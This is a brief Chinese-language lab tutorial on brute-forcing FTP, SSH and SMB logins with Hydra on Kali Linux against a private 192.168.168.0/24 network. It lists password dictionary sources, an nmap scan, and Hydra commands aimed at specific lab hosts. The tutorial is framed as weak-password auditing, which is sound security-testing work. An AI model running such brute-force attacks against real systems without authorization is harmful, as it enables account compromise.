Hydra是一款专业的服务密码探测工具，支持FTP、LDAP、MYSQL、Oracle、POP3、SMB、SSH等网络服务，多用于信息安全检查工作中弱口令登陆测试。

实验环境

操作系统：Kali 2019.4

目标网络：192.168.168.0/24

爆破教程

第一步 升级系统、软件版本(可选)

root@kali:~# mv /etc/apt/sources.list /etc/apt/sources.list.bak

root@kali:~# echo "deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib" >/etc/apt/sources.list

root@kali:~# apt-get -y update

root@kali:~# apt-get -y upgrade

root@kali:~# apt-get -y dist-upgrade

root@kali:~# apt-get -y clean

第二步 准备密码字典(可选)

弱密码字典合集包：https://weakpass.com

Kali系统自带字典：/usr/share/wordlists

自定义字典生成脚本：https://github.com/LandGrey/pydictor

第三步 扫描指定网段主机开放的服务(可选)

root@kali:~# nmap 192.168.168.0/24

第四步 爆破服务(FTP、SSH、SMB)

简易用法：hydra -l 用户名 -P 密码字典 IP地址 服务名称

常见用法：hydra –L 用户名字典 –P 密码字典 t 线程数 –vV 详细显示 –o 生成爆破后的密码记录 –f (爆破成功立即结束) –e n (尝试空密码) IP地址 服务名称

root@kali:~# hydra -l wanghualang -P /wanghualang/hydra/password/tmp.txt 192.168.168.202 smb

root@kali:~# hydra -l wanghualang -P /wanghualang/hydra/password/tmp.txt 192.168.168.11 ssh

root@kali:~# hydra -l wanghualang -P /wanghualang/hydra/password/tmp.txt 192.168.168.1 ftp